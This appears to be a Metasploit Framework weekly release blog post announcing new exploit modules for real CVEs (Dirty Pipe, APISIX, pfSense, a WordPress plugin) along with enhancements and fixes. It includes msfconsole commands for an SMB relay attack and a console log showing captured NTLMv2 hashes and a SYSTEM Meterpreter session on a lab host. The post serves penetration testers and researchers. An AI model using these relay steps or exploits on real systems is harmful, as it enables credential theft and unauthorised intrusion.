Last updated at Mon, 05 Feb 2024 21:44:02 GMT
Mucking out the pipes.
Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber's training. The exploit targeting modern Linux v5 kernels helps elevate user privileges by overwriting a SUID binary of your choice by plunging some payload gold through a pipe.
Long live the SMB relay!
SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7 the windows/smb/smb_relay
module that had been languishing in disuse due to evolutions in the protocol is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets that Metasploit will intelligently cycle through them to ensure that it is not wasting incoming connections.
Example module usage:
use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run
Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:
msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client : 192.168.123.4
[SMB] NTLMv2-SSP Username : \admin
[SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000
A session will be opened on the relay target with the associated credentials:
msf6 exploit(windows/smb/smb_relay) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)
Further details can be found in the Metasploit SMB Relay documentation
Return of the GSoC!
The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications are will open April 4th and close April 19th. Changes this year open the program up to all newcomers of open source that are 18 years and older. Join use on #slack and checkout our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you'd like to add to Metasploit.
New module content (5)
- Wordpress MasterStudy Admin Account Creation by Numan Türle and h00die, which exploits CVE-2022-0441 - This adds an auxiliary module that leverages a sanitization issue in the Wordpress plugin MasterStudy to create an admin account in Wordpress.
- Dirty Pipe Local Privilege Escalation via CVE-2022-0847 by Max Kellermann and timwr, which exploits CVE-2022-0847 - This exploits a privilege escalation vulnerability in the Linux kernel starting with version
5.8
. The module leverages the vulnerability to overwrite an SUID binary in order to gain privileges as theroot
user. - APISIX Admin API default access token RCE by Heyder Andrade and YuanSheng Wang, which exploits CVE-2022-24112 - This adds an unauthenticated exploit targeting Apache APISIX. It leverages two vulnerabilities, the first of which is a default API key and the second is an IP restriction bypass. The result is OS command execution as the service user.
- pfSense Diag Routes Web Shell Upload by Abdel Adim "smaury" Oisfi of Shielder and jbaines-r7, which exploits CVE-2021-41282 - This PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.
- SMB Relay Rewrite from adfoster-r7 - Updates the SMB relay module to support relaying to targets over SMB 2 and SMB 3. It also adds intelligent targeting for multiple hosts so if the incoming authentication information is incompatible with one, the next target host will be tried.
Enhancements and features
- #16135 from sjanusz-r7 - This adds support for logging Meterpreter's TLV Packets with
setg SessionTlvLogging true
. Other values for theSessionTlvLogging
option includeconsole
,false
, andfile:<file_location>
. - #16141 from adfoster-r7 - This adds service manager commands to
msfconsole
. - #16219 from sjanusz-r7 - This updates the packet inspection for the
enumextcmd
andloadlib
commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6. - #16258 from sjanusz-r7 - This improves Meterpreter's TLV logging support to show human readable names for the Meterpreter TLV values of. To view this functionality run
setg SessionTlvLogging true
with a Meterpreter session open. Next, run a Meterpreter command such asdir
. - #16269 from bcoles - This improves validation for Android payloads to verify Java is correctly installed and apktool.jar exists in the same directory as apktool.
- #16270 from bcoles - This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
- #16282 from 3V3RYONE - This adds the
lcat
command to Meterpreter which allows the user to cat a local file. - #16288 from bcoles - This change display the output of apktool if the apktool output contains Java exceptions, which is useful for debugging errors in Android APK injection.
Bugs fixed
- #16145 from adfoster-r7 - This fixes a case sensitivity issue with option handling for the
to_handler
command on Metasploit payloads. Previously, setting anLPORT
value within a payload would not correctly override the previously setlport
value. - #16153 from jmartin-r7 - This fixes a bug in the
auxiliary/client/smtp/emailer
which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully. - #16265 from smashery - This fixes an edgecase which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
- #16268 from bwatters-r7 - This updates the check method of the
exploit/windows/local/bypassuac_comhijack
module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable. - #16283 from bcoles - This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
- #16286 from bcoles - This fixes a payload truncation issue in
post/windows/manage/persistence_exe
on Windows systems caused by the usage ofIO.read
. - #16294 from bcoles - This change fixes the Android APK injection functionality of
msfvenom
to use the new signing toolapksigner
instead ofjarsigner
, which allows the applications to install successfully on the latest version of Android (Android 11). - #16310 from adfoster-r7 - This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
- #16311 from sjanusz-r7 - This updates msfconsole's search functionality to include the 64 bit variant of
payload_windows/x64/encrypted_shell
payloads - #16312 from bwatters-r7 - This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first issue fixed was a compatibility check between the target host architecture and the payload. The second issue fixed was with the on session callback that sets the current working directory.
- #16322 from zeroSteiner - This fixes a regression issue with the
hosts
command tab completion and the--search
option’s functionality.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).